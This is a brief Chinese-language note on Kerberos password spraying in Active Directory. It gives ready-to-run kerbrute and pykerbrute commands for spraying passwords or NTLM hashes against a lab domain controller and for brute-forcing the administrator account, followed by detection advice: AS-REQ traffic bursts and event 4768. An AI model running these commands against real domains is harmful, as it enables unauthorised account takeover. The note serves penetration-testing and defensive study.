域内密码喷洒

原理：请求包Cname对应的额值是用户名。用户名存在密码正确和密码错误两种情况的asrep返回包不一样。

密码喷洒和普通的爆破的区别在于 普通爆破利用固定的用户名爆破密码。密码喷洒用于 同一个密码爆破不同用户不触发账号锁定策略

工具使用

kerbrute 密码喷洒命令

kerbrute_windows_amd64.exe passwordspray --dc 10.211.55.4 -d xie.com user.txt p@ss1234

tips:如果探测到没有账户锁定策略 可以使用单向密码爆破

kerbrute_windows_amd64.exe bruteuser --dc 10.211.55.4 -d xie.com pass.txt administrator

pykerbrute密码喷洒

针对密码进行喷洒

python2 ADPwdSpray.py 10.211.55.4 xie.com user.txt clearpassword p@ss1234 tcp 

python2 ADPwdSpray.py 10.211.55.4 xie.com user.txt clearpassword p@ss1234 udp

针对ntlm hash等进行喷洒

python2 ADPwdSpray.py 10.211.55.4 xie.com user.txt ntlmhash hash tcp 

python2 ADPwdSpray.py 10.211.55.4 xie.com user.txt ntlmhash hash udp

防御：

1.流量层面 通过同一ip在短时间诶是否发送了大量的as-req包来判断。

2.日志层面：口令爆破成功是，会产生事件ID为4768的结果代码为0x0的审核成功kerberos身份验证服务时间日志。但默认是不记录该日志的需要开启审核和高级审核策略